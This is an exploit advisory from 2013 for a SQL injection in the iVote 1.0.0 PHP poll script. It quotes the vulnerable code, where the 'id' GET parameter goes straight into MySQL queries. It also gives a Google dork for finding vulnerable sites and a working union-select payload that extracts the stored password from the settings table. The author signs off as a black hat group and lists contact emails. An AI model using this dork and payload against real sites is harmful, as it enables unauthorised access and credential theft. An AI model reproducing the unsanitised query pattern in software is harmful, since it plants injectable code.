# Exploit Title: iVot Sql Injection
# Google Dork: inurl:details.php?id=
# Date: 2013 July 11
# Exploit Author: Ashiyane Digital Security Team
# Software Link:
http://www.persianscript.ir/1391/09/25/ivote-poll-persian-script-download/
# Version: 1.0.0
# Tested on: Linux CentOS , Linux Ubunto , Windows 8

vulnerability : details.php on line 5

$id = $_GET['id'];

$selectc = mysql_query("SELECT * FROM comments WHERE id = $id");

$select = mysql_query("SELECT * FROM votes WHERE V_Id = $id");

$row = mysql_fetch_array($select);

///////////////////////////////////////

Example : http://example.com/iVote/details.php?id=1 union select
1,password,3,4 from settings


///////////////////////
TNX : Rz04 & Crypt0
I Love Iran & all IRanian Black Hats :X

I'm , Bi Edea (R3za)
Email : momtane666@yahoo.com
Gmail : kafaran.blackhats@Gmail.com